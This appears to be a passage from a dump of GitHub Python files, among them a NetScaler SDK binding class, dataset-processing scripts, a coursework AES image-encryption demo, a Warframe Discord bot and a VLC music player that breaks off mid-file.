+{"seq_id":"2623659504","text":"from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource\nfrom nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response\nfrom nssrc.com.citrix.netscaler.nitro.service.options import options\nfrom nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception\n\nfrom nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util\n\nclass sslcertkey_sslocspresponder_binding(base_resource) :\n\t\"\"\" Binding class showing the sslocspresponder that can be bound to sslcertkey.\n\t\"\"\"\n\tdef __init__(self) :\n\t\tself._ocspresponder = None\n\t\tself._priority = None\n\t\tself._certkey = None\n\t\tself._ca = None\n\t\tself.___count = 0\n\n\t@property\n\tdef priority(self) :\n\t\tr\"\"\"ocsp priority.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@priority.setter\n\tdef priority(self, priority) :\n\t\tr\"\"\"ocsp priority.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._priority = priority\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef ca(self) :\n\t\tr\"\"\"The certificate-key pair being unbound is a Certificate Authority (CA) certificate. If you choose this option, the certificate-key pair is unbound from the list of CA certificates that were bound to the specified SSL virtual server or SSL service.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._ca\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@ca.setter\n\tdef ca(self, ca) :\n\t\tr\"\"\"The certificate-key pair being unbound is a Certificate Authority (CA) certificate. If you choose this option, the certificate-key pair is unbound from the list of CA certificates that were bound to the specified SSL virtual server or SSL service.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._ca = ca\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef certkey(self) :\n\t\tr\"\"\"Name of the certificate-key pair. Minimum length = 1.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._certkey\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@certkey.setter\n\tdef certkey(self, certkey) :\n\t\tr\"\"\"Name of the certificate-key pair. Minimum length = 1\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._certkey = certkey\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@property\n\tdef ocspresponder(self) :\n\t\tr\"\"\"OCSP responders bound to this certkey.\n\t\t\"\"\"\n\t\ttry :\n\t\t\treturn self._ocspresponder\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@ocspresponder.setter\n\tdef ocspresponder(self, ocspresponder) :\n\t\tr\"\"\"OCSP responders bound to this certkey.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tself._ocspresponder = ocspresponder\n\t\texcept Exception as e:\n\t\t\traise e\n\n\tdef _get_nitro_response(self, service, response) :\n\t\tr\"\"\" converts nitro response into object and returns the object array in case of get request.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tresult = service.payload_formatter.string_to_resource(sslcertkey_sslocspresponder_binding_response, response, self.__class__.__name__)\n\t\t\tif(result.errorcode != 0) :\n\t\t\t\tif (result.errorcode == 444) :\n\t\t\t\t\tservice.clear_session(self)\n\t\t\t\tif result.severity :\n\t\t\t\t\tif (result.severity == \"ERROR\") :\n\t\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\t\telse :\n\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\treturn result.sslcertkey_sslocspresponder_binding\n\t\texcept Exception as e :\n\t\t\traise e\n\n\tdef _get_object_name(self) :\n\t\tr\"\"\" Returns the value of object identifier argument\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif self.certkey is not None :\n\t\t\t\treturn str(self.certkey)\n\t\t\treturn None\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\n\t@classmethod\n\tdef add(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tupdateresource = sslcertkey_sslocspresponder_binding()\n\t\t\t\tupdateresource.certkey = resource.certkey\n\t\t\t\tupdateresource.ocspresponder = resource.ocspresponder\n\t\t\t\tupdateresource.priority = resource.priority\n\t\t\t\treturn updateresource.update_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tupdateresources = [sslcertkey_sslocspresponder_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tupdateresources[i].certkey = resource[i].certkey\n\t\t\t\t\t\tupdateresources[i].ocspresponder = resource[i].ocspresponder\n\t\t\t\t\t\tupdateresources[i].priority = resource[i].priority\n\t\t\t\treturn cls.update_bulk_request(client, updateresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef delete(cls, client, resource) :\n\t\ttry :\n\t\t\tif resource and type(resource) is not list :\n\t\t\t\tdeleteresource = sslcertkey_sslocspresponder_binding()\n\t\t\t\tdeleteresource.certkey = resource.certkey\n\t\t\t\tdeleteresource.ocspresponder = resource.ocspresponder\n\t\t\t\tdeleteresource.ca = resource.ca\n\t\t\t\treturn deleteresource.delete_resource(client)\n\t\t\telse :\n\t\t\t\tif resource and len(resource) > 0 :\n\t\t\t\t\tdeleteresources = [sslcertkey_sslocspresponder_binding() for _ in range(len(resource))]\n\t\t\t\t\tfor i in range(len(resource)) :\n\t\t\t\t\t\tdeleteresources[i].certkey = resource[i].certkey\n\t\t\t\t\t\tdeleteresources[i].ocspresponder = resource[i].ocspresponder\n\t\t\t\t\t\tdeleteresources[i].ca = resource[i].ca\n\t\t\t\treturn cls.delete_bulk_request(client, deleteresources)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t@classmethod\n\tdef get(cls, service, certkey=\"\", option_=\"\") :\n\t\tr\"\"\" Use this API to fetch sslcertkey_sslocspresponder_binding resources.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tif not certkey :\n\t\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\telse :\n\t\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\t\tobj.certkey = certkey\n\t\t\t\tresponse = obj.get_resources(service)\n\t\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef get_filtered(cls, service, certkey, filter_) :\n\t\tr\"\"\" Use this API to fetch filtered set of sslcertkey_sslocspresponder_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\tobj.certkey = certkey\n\t\t\toption_ = options()\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\treturn response\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count(cls, service, certkey) :\n\t\tr\"\"\" Use this API to count sslcertkey_sslocspresponder_binding resources configued on NetScaler.\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\tobj.certkey = certkey\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\tresponse = obj.get_resources(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\n\t@classmethod\n\tdef count_filtered(cls, service, certkey, filter_) :\n\t\tr\"\"\" Use this API to count the filtered set of sslcertkey_sslocspresponder_binding resources.\n\t\tFilter string should be in JSON format.eg: \"port:80,servicetype:HTTP\".\n\t\t\"\"\"\n\t\ttry :\n\t\t\tobj = sslcertkey_sslocspresponder_binding()\n\t\t\tobj.certkey = certkey\n\t\t\toption_ = options()\n\t\t\toption_.count = True\n\t\t\toption_.filter = filter_\n\t\t\tresponse = obj.getfiltered(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e:\n\t\t\traise e\n\nclass sslcertkey_sslocspresponder_binding_response(base_response) :\n\tdef __init__(self, length=1) :\n\t\tself.sslcertkey_sslocspresponder_binding = []\n\t\tself.errorcode = 0\n\t\tself.message = \"\"\n\t\tself.severity = \"\"\n\t\tself.sessionid = \"\"\n\t\tself.sslcertkey_sslocspresponder_binding = [sslcertkey_sslocspresponder_binding() for _ in range(length)]\n\n","repo_name":"MayankTahil/nitro-ide","sub_path":"nitro-python-1.0/nssrc/com/citrix/netscaler/nitro/resource/config/ssl/sslcertkey_sslocspresponder_binding.py","file_name":"sslcertkey_sslocspresponder_binding.py","file_ext":"py","file_size_in_byte":7244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"12933681684","text":"from http.client import HTTPResponse\nimport json\nfrom api.models.pokemon import Pokemon\nfrom rest_framework import viewsets, permissions\nfrom api.serializers.pokemon import PokemonSerializer\n\n\ndef store_pokemon(request):\n with open(\"sample.json\", \"r\") as json_file:\n pokemon_list = json.load(json_file)\n for key, value in pokemon_list.items():\n print(key)\n pokemon = Pokemon(\n name=value[\"name\"].title(),\n pokedex_entry=value[\"id\"],\n type=value[\"type\"],\n default_sprite=value[\"default_sprite\"],\n shiny_sprite=value[\"shiny_sprite\"],\n )\n pokemon.save()\n return HTTPResponse({'status': 200})\n","repo_name":"JaycobDuffel/pokedex-mobile-app","sub_path":"pokedex-api/api/api/views/pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23870064981","text":"'''\n1. Important keys of each product:\n - `bullet_point`\n - Content: Important features of the products\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `color`\n - Content: Color of the product as text\n - Format: `[{\"language_tag\": , \"standardized_values\": [],\n \"value\": }, ...]`\n - `country`\n - Content: Country of the marketplace, as an\n [ISO 3166-1 alpha 2](https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2)\n code\n - Format: ``\n - `domain_name`\n - Content: Domain name of the marketplace where the product is found.\n A product listing in this collection is uniquely identified by\n (`item_id`, `domain_name`)\n - Format: ``\n - `item_dimensions`\n - Content: Dimensions of the product (height, width, length)\n - Format: `{\"height\": {\"normalized_value\": {\"unit\": , \"value\":\n }, \"unit\": , \"value\": }, \"length\":\n {\"normalized_value\": {\"unit\": , \"value\": }, \"unit\": ,\n \"value\": }, \"width\": {\"normalized_value\": {\"unit\": ,\n \"value\": }, \"unit\": , \"value\": }}}`\n - `item_id`\n - Content: The product reference id. A product listing in this\n collection is uniquely identified by (`item_id`, `domain_name`).\n A corresponding product page may exist at\n `https://www./dp/`\n - Format: ``\n - `item_keywords`\n - Content: Keywords for the product\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `item_name`\n - Content: The product name\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `item_shape`\n - Content: Description of the product shape\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `item_weight`\n - Content: The product weight\n - Format: `[{\"normalized_value\": {\"unit\": , \"value\": },\n \"unit\": , \"value\": }, ...]`\n - `main_image_id`\n - Content: The main product image, provided as an `image_id`. See the\n descripton of `images/metadata/images.csv.gz` below\n - Format: ``\n - `material`\n - Content: Description of the product material\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `model_name`\n - Content: Model name\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `pattern`\n - Content: Product pattern\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `product_description`\n - Content: Product description as HTML \n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n - `product_type`\n - Content: Product type (category)\n - Format: ``\n - `style`\n - Content: Style of the product\n - Format: `[{ \"language_tag\": , \"value\": }, ...]`\n \n2. A datasample of a product:\n {\"item_dimensions\": \n {\"height\": {\"normalized_value\": {\"unit\": \"inches\", \"value\": 12}, \"unit\": \"inches\", \"value\": 12}, \n \"length\": {\"normalized_value\": {\"unit\": \"inches\", \"value\": 12}, \"unit\": \"inches\", \"value\": 12}, \n \"width\": {\"normalized_value\": {\"unit\": \"inches\", \"value\": 1.5}, \"unit\": \"inches\", \"value\": 1.5}}, \n \"bullet_point\": [\n {\"language_tag\": \"en_US\", \"value\": \"These vintage lawn chairs may have seen better days, but they have obviously had a rebirth. Brightly painted, they've been repurposed as the hub of hang-out spot outside a warehouse. This colorful urban-look piece will add a bright spot to any room.\"}, \n {\"language_tag\": \"en_US\", \"value\": \"A modern colorful print with a vintage twist\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Printed on wood, framed in a white-painted wood frame\"}, \n {\"language_tag\": \"en_US\", \"value\": \"12\\\" x 12\\\"\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Made to order\"}], \n \"color\": [\n {\"language_tag\": \"en_US\", \"standardized_values\": [\"Multi\"], \"value\": \"Multicolor\"}], \n \"item_id\": \"B073P5PZ5P\", \n \"item_name\": [\n {\"language_tag\": \"zh_CN\", \"value\": \"Rivet \\u590d\\u53e4\\u84dd\\u8272\\u9ec4\\u8272\\u548c\\u7eff\\u8272\\u6905\\u5b50 \\u9ed1\\u8272\\u6728\\u6846\\u5899\\u58c1\\u827a\\u672f\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Amazon Brand \\u2013 Rivet Vintage Blue Yellow and Green Chairs in White Wood Frame Wall Art, 12\\\" x 12\\\"\"}], \n \"item_weight\": [{\"normalized_value\": {\"unit\": \"pounds\", \"value\": 2.5}, \"unit\": \"pounds\", \"value\": 2.5}], \n \"model_number\": [{\"value\": \"16523-frwa30\"}], \n \"product_type\": [{\"value\": \"HOME\"}], \n \"style\": [{\"language_tag\": \"en_US\", \"value\": \"White\"}], \n \"main_image_id\": \"91e1hw35cDL\", \n \"item_keywords\": [\n {\"language_tag\": \"en_US\", \"value\": \"framed-prints\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall art\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall decor\"}, \n {\"language_tag\": \"en_US\", \"value\": \"canvas wall art\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall art for living room\"}, \n {\"language_tag\": \"en_US\", \"value\": \"bathroom decor\"}, \n {\"language_tag\": \"en_US\", \"value\": \"posters\"}, \n {\"language_tag\": \"en_US\", \"value\": \"framed wall art\"}, \n {\"language_tag\": \"en_US\", \"value\": \"wall decorations for living room\"}, \n {\"language_tag\": \"en_US\", \"value\": \"living room decor\"}, \n {\"language_tag\": \"en_US\", \"value\": \"cuadros de pared de sala\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Rivet\"}, \n {\"language_tag\": \"en_US\", \"value\": \"mid century\"}, \n {\"language_tag\": \"en_US\", \"value\": \"modern\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Multi\"}, \n {\"language_tag\": \"en_US\", \"value\": \"Multi\"}, \n {\"language_tag\": \"en_US\", \"value\": \"12\\\"x12\\\"\"}], \n \"country\": \"US\", \n \"domain_name\": \"amazon.com\"\n'''\nimport json\nimport os\nimport cv2\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport glob\n\n\ndata_root = '/media/hxd/82231ee6-d2b3-4b78-b3b4-69033720d8a8/MyDatasets/amazon'\nattr = 'color' # product_type\nmax_num_values_per_attr = 25\n\n# load product\nproducts = []\njson_files = glob.glob(data_root + '/metadata/*.json')\nfor json_file in json_files:\n for line in open(json_file, 'r'):\n products.append(json.loads(line))\n# load image\nimg_info = pd.read_csv(data_root + '/images.csv')\n\nflag_auto_attr_value = True\nif not flag_auto_attr_value:\n ## (1) manually define attribute values\n attr_list = {\n 'color':['Black', 'White', 'Blue', 'Brown', 'Gray', 'Orange', 'Red', 'Yellow', 'Pink', 'Silver', 'Bronze', 'Cream', 'Walnut'], \n 'material':['Leather', 'Metal', 'Plastic', 'Glass', 'Rubber', 'Stoneware', 'Wood', 'Fabric', 'Memory_foam'],\n 'item_shape':['Rectangular', 'Ellipsoidal', 'Cubic', 'Round', 'Long', 'L-Shape'],\n 'style':['Modern', 'Contemporary', 'Traditional', 'Classic']}\n att_values = attr_list[attr]\n att_values = [x.lower() for x in att_values]\nelse:\n ## (2) obtain attribute values by frequency\n tmp_dic = {}\n for product in products:\n if attr in product.keys():\n if attr == 'product_type':\n att_value = [x['value'] for x in product[attr]]\n else:\n att_value = [x['value'] for x in product[attr] if x['language_tag'] == 'en_US']\n if len(att_value) > 0:\n att_value = att_value[0].lower()\n if att_value in tmp_dic.keys():\n tmp_dic[att_value] += 1\n else:\n tmp_dic[att_value] = 1\n\n top_values = dict(sorted(tmp_dic.items(), key=lambda item: item[1], reverse=True))\n att_values = list(top_values.keys())#[:max_num_values_per_attr]\n\nfor value in att_values:\n if not os.path.exists(data_root + '/img_by_attr/' + attr + '/' + value):\n os.makedirs(data_root + '/img_by_attr/' + attr + '/' + value)\n\n\nproduct_descr = {}\nfor product in products:\n description = []\n # if product['country'] == 'US' and \\\n if attr in product.keys() and \\\n 'main_image_id' in product.keys():\n if attr == 'product_type':\n att_value = [x['value'] for x in product[attr]]\n else:\n att_value = [x['value'] for x in product[attr] if x['language_tag'] == 'en_US']\n if len(att_value) > 0:\n att_value = att_value[0].lower()\n if att_value in att_values:\n img_id = product['main_image_id']\n img_path = img_info.loc[img_info['image_id'] == img_id]['path'].values[0]\n img = cv2.imread(data_root + '/small/' + img_path)\n cv2.imwrite(data_root + '/img_by_attr/' + attr + '/' + att_value + '/' + img_id + '.jpg', img)\n if 'bullet_point' in product.keys():\n description = [x['value'] for x in product['bullet_point'] if x['language_tag'] == 'en_US']\n product_descr[img_id] = description\n\nwith open(data_root + '/img_by_attr/' + attr + '/product_description.json', 'w') as json_file:\n json.dump(product_descr, json_file)","repo_name":"xiaodanhu/AttDiscovery","sub_path":"amazon/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":9202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"29489222118","text":"from beanie import Document, Link\nfrom pydantic import BaseModel, EmailStr\nfrom typing import Optional, List\nfrom models.event import Event\n\nclass User(Document):\n email: EmailStr\n password: str\n events: Optional[List[Link[Event]]]\n\n class Settings:\n name = \"users\"\n\n class Config:\n json_schema_extra = {\n \"example\": {\n \"email\": \"user@mail.com\",\n \"username\": \"theusername\",\n \"events\": [],\n }\n }\n\nclass TokenResponse(BaseModel):\n access_token: str\n token_type: str\n\n class Config:\n json_schema_extra = {\n \"example\": {\n \"access_token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidXNlcjFAbWFpbC5jb20iLCJleHBpcmVzIjoxNjk2MTE1NzAwLjMzNzg4MX0.eJyZzDExjS1R4GCOSu5J5JQWgc7yJnisAWoGWY9B3uU\",\n \"token_type\": \"Bearer\",\n \"events\": [],\n }\n }","repo_name":"duvg/planner","sub_path":"models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"16615202396","text":"import io\nimport sys\nfrom pathlib import Path\n\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\nfrom PIL import Image\n\n\nclass EncryptAES:\n def __init__(self, encrypt_mode):\n self._mode = encrypt_mode\n self._key = Random.new().read(AES.block_size)\n self._iv = self._key\n\n key_path = Path(__file__).parent / 'key.txt'\n with open(key_path, 'wb') as f:\n f.write(self._key)\n\n def encrypt(self, plain_text):\n if self._mode == ECB:\n self._ecb_encrypt(plain_text=plain_text)\n elif self._mode == CBC:\n self._cbc_encrypt(plain_text=plain_text)\n elif self._mode == CUSTOM:\n self._custom_encrypt(plain_text=plain_text)\n\n def _ecb_encrypt(self, plain_text):\n count = 0\n count_newline = 0\n cipher = AES.new(self._key, AES.MODE_ECB)\n cipher_text = b''\n\n # 把不需要加密的部分取出\n while count_newline < 3:\n byte = plain_text[count]\n count += 1\n byte = bytes(chr(byte), encoding='utf-8')\n cipher_text += byte\n\n if byte == b'\\n':\n count_newline += 1\n\n block_index = 0\n\n # encrypt\n plain_text = plain_text[count:]\n\n while len(plain_text) % AES.block_size != 0:\n plain_text += b'\\x00'\n\n while block_index < len(plain_text):\n block = plain_text[block_index: block_index + AES.block_size]\n cipher_block = cipher.encrypt(block)\n cipher_text += cipher_block\n\n block_index += AES.block_size\n\n self._write_image(cipher_text)\n\n def _cbc_encrypt(self, plain_text):\n count = 0\n count_newline = 0\n cipher = AES.new(self._key, AES.MODE_ECB)\n cipher_text = b''\n prev_ct = self._iv\n\n # 把不需要加密的部分取出\n while count_newline < 3:\n byte = plain_text[count]\n count += 1\n byte = bytes(chr(byte), encoding='utf-8')\n cipher_text += byte\n\n if byte == b'\\n':\n count_newline += 1\n\n block_index = 0\n\n # encrypt\n plain_text = plain_text[count:]\n\n while len(plain_text) % AES.block_size != 0:\n plain_text += b'\\x00'\n\n while block_index < len(plain_text):\n block = plain_text[block_index: block_index + AES.block_size]\n final_block = byte_xor(block, prev_ct)\n\n cipher_block = cipher.encrypt(final_block)\n prev_ct = cipher_block\n cipher_text += cipher_block\n\n block_index += AES.block_size\n\n self._write_image(cipher_text)\n\n def _custom_encrypt(self, plain_text):\n count = 0\n count_newline = 0\n cipher = AES.new(self._key, AES.MODE_ECB)\n cipher_text = b''\n prev_ct = self._iv\n # cast key to bin\n binKey = bin(int.from_bytes(self._key, byteorder=sys.byteorder))[2:]\n\n # 把不需要加密的部分取出\n while count_newline < 3:\n byte = plain_text[count]\n count += 1\n byte = bytes(chr(byte), encoding='utf-8')\n cipher_text += byte\n\n if byte == b'\\n':\n count_newline += 1\n\n block_index = 0\n\n # encrypt\n plain_text = plain_text[count:]\n\n while len(plain_text) % AES.block_size != 0:\n plain_text += b'\\x00'\n\n while block_index < len(plain_text):\n block = plain_text[block_index: block_index + AES.block_size]\n final_block = byte_xor(block, prev_ct)\n\n cipher_block = cipher.encrypt(final_block)\n\n if(binKey[int((block_index/AES.block_size)%len(binKey))] == '0'):\n prev_ct = cipher_block\n else:\n prev_ct = cipher_block[1:] + b'\\x00'\n\n cipher_text += cipher_block\n\n block_index += AES.block_size\n\n self._write_image(cipher_text)\n\n @staticmethod\n def _write_image(cipher_text):\n ppm_path = Path(__file__).parent / 'result.ppm'\n with open(ppm_path, \"wb\") as f:\n f.write(cipher_text)\n\n ppm_picture = ppm_path\n output_img = Image.open(ppm_picture)\n\n result_path = Path(__file__).parent / 'result.png'\n output_img.save(result_path, 'png')\n\n\ndef byte_xor(ba1, ba2):\n return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])\n\n\nECB = 'ECB'\nCBC = 'CBC'\nCUSTOM = 'CST'\n\n\nif __name__ == '__main__':\n mode = input('輸入加密的Mode: ')\n\n path = Path(__file__).parent / 'mypppm.ppm'\n im = Image.open(path)\n img_byte_array = io.BytesIO()\n im.save(img_byte_array, format=im.format)\n img_byte_array = img_byte_array.getvalue()\n\n if mode == ECB:\n encrypt_aes = EncryptAES(encrypt_mode=ECB)\n encrypt_aes.encrypt(plain_text=img_byte_array)\n elif mode == CBC:\n encrypt_aes = EncryptAES(encrypt_mode=CBC)\n encrypt_aes.encrypt(plain_text=img_byte_array)\n elif mode == CUSTOM:\n encrypt_aes = EncryptAES(encrypt_mode=CUSTOM)\n encrypt_aes.encrypt(plain_text=img_byte_array)\n","repo_name":"ImJsaw/Information_Security_Class","sub_path":"Hw3/EncryptAES.py","file_name":"EncryptAES.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"38017883261","text":"import discord\r\nimport datetime\r\n\r\nfrom CobraLib import source_html\r\nfrom StorageConfig import Traduction\r\n\r\ndef ressource(args):\r\n data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n item = list(' '.join(args[1:]).lower())\r\n item = \"\".join(item)\r\n tab = \"\"\r\n pos = 0\r\n zone = data_html[data_html.find(\"Resource Drops by Resource:\"):data_html.find(\"Sigil Drops by Enemy:\")].lower()\r\n if zone.count(item) != 0:\r\n tab = '**' + zone[zone.find(item + '
'):zone.find(\r\n '
',\r\n zone.find(item + '
'))].replace('
', '**\\n__').capitalize().replace(\r\n '
', '__\\t\\t\\t__').replace('
', '__\\n```diff\\n').replace('
',\r\n '\\t').replace(\r\n '
', '\\n') + '```'\r\n zone = data_html[data_html.find(\"Missions:\"):data_html.find(\"Relics:\")].lower()\r\n if zone.count(item) != 0:\r\n Mission = '?????????'\r\n Rotation = '????????????'\r\n MissionLimit1 = '
', '\\n') + '```'\r\n if tab == \"**```\" and \"blueprint\" not in item:\r\n args.append(\"blueprint\")\r\n return ItemDrops(args)\r\n elif tab == \"**```\":\r\n return Traduction.bug(item)\r\n else:\r\n return tab\r\n\r\ndef mods(args):\r\n item = list(' '.join(args[1:]).lower())\r\n item = \"\".join(item)\r\n tab = \"\"\r\n modslist = source_html('https://wf.snekw.com/mods-wiki').lower()\r\n if modslist.count(item) == 0:\r\n return Traduction.bug(item)\r\n data_html = source_html(\"https://n8k6e2y6.ssl.hwcdn.net/repos/hnfvc0o3jnfvc873njb03enrf56.html\")\r\n zone = data_html[data_html.find(\"Mod Drops by Mod:\"):data_html.find(\"Blueprint/Item Drops by Enemy:\")].lower()\r\n if zone.count(item) >= 1:\r\n tab = '**' + zone[zone.find(item + '
'):zone.find(\r\n '
',\r\n zone.find(item + '
'))].replace('
', '**\\n__').capitalize().replace(\r\n '
', '__\\t\\t\\t__').replace('
', '__\\n```diff\\n').replace('
',\r\n '\\t').replace(\r\n '
', '\\n') + '```\\n'\r\n data_html = source_html(\"https://drops.warframestat.us/data/all.json\").lower()\r\n if data_html.count(item) >= 1:\r\n tab = tab + '**' + item.capitalize() + '**\\n'\r\n posData = 0\r\n for i in range(0, data_html.count(item)):\r\n posData = data_html.find(item, posData + len(item))\r\n Objectivename = data_html[\r\n data_html.rfind('\"objectivename\":\"', 0, posData) + len('\"objectivename\":\"'):data_html.find(\r\n '\"', data_html.rfind('\"objectivename\":\"', 0, posData) + len('\"objectivename\":\"'))]\r\n if Objectivename == 'ds':\r\n zoneb = data_html[data_html.rfind(\"}]\", 0, posData):data_html.rfind(\":[{\", 0, posData)]\r\n MissionName = zoneb[zoneb.find('\"') + 1:zoneb.find('\"', zoneb.find('\"') + 2)]\r\n gamemode = zoneb[zoneb.find('{\"gamemode\":\"') + len('{\"gamemode\":\"'):zoneb.find('\"', zoneb.find(\r\n '{\"gamemode\":\"') + len('{\"gamemode\":\" '))]\r\n if MissionName == 'c' or MissionName == 'b' or MissionName == 'a':\r\n MissionName2=data_html[data_html.rfind('\"',0,data_html.rfind('\":{\"ga',0,posData))+1:data_html.rfind('\":{\"ga',0,posData)].capitalize()\r\n gamemode=data_html[data_html.rfind('\"gamemode\":\"',0,posData)+len('\"gamemode\":\"'):data_html.find('\"',data_html.rfind('\"gamemode\":\"',0,posData)+len('\"gamemode\":\"'))].capitalize()\r\n MissionName = 'Rotation ' + MissionName\r\n MissionName=MissionName2.capitalize()+'\\n'+MissionName\r\n Objectivename = '\\n**' + MissionName + '** : ' + gamemode.capitalize()\r\n chancedrop = data_html[data_html.find('\"chance\":', posData) + len('\"chance\":'):data_html.find('}',\r\n data_html.find(\r\n '\"chance\":',\r\n posData) + len(\r\n '\"chance\":'))]\r\n tab = tab + Traduction.FindHere() + Objectivename + '\\nDrop Chance: ' + chancedrop + '\\n'\r\n if len(tab) >= 1750:\r\n return tab[:1900 ].replace('%)', \"%)\\n\") + '\\nAnd more...', 'message.author'\r\n if not tab == \"\":\r\n return tab,\"msg\"\r\n else:\r\n return Traduction.bug(item),\"msg\"","repo_name":"typlosion14/WarframeBot","sub_path":"resources/official.py","file_name":"official.py","file_ext":"py","file_size_in_byte":16292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"33574452494","text":"from tkinter import *\r\nfrom tkinter import filedialog as fd\r\nimport os\r\nimport vlc\r\nimport random\r\n\r\nInstance = vlc.Instance()\r\nplayer = Instance.media_player_new()\r\n\r\nafter_id = ''\r\n\r\nclass Music():\r\n song_name = ''\r\n random_song = False\r\n ext_list = ['.mp3', '.wav', '.ogg']\r\n player_volume = 50\r\n\r\n def change_random(self):\r\n self.random_song = not self.random_song\r\n if self.random_song: prevMusicButton['state'] = 'disabled'\r\n else: prevMusicButton['state'] = 'active'\r\n\r\n def switch_file(filepath, prev):\r\n directory = os.path.dirname(filepath)\r\n filename = os.path.basename(filepath)\r\n fileList = os.listdir(directory)\r\n if prev: nextIndex = fileList.index(filename) - 1\r\n else: nextIndex = fileList.index(filename) + 1\r\n if nextIndex == len(fileList):\r\n nextIndex = 0\r\n nextpath = directory + '/' + fileList[nextIndex]\r\n return nextpath\r\n \r\n def random_file(self, filepath):\r\n directory = os.path.dirname(filepath)\r\n filename = os.path.basename(filepath)\r\n fileList = os.listdir(directory)\r\n nextIndex = random.randint(0, len(fileList) - 1)\r\n nextpath = directory + '/' + fileList[nextIndex]\r\n if nextpath == filepath: self.random_file(self, filepath)\r\n return nextpath\r\n\r\n def start_player(self):\r\n self.stop_player()\r\n\r\n self.song_name = fd.askopenfilename(title = 'Выберите музыку')\r\n nowPlaying['text'] = os.path.basename(self.song_name)\r\n Media = Instance.media_new(self.song_name)\r\n Media.get_mrl()\r\n player.set_media(Media)\r\n player.play() \r\n player.audio_set_volume(self.player_volume) \r\n\r\n def next_song(self, prev):\r\n Music.skip_not_music(self, 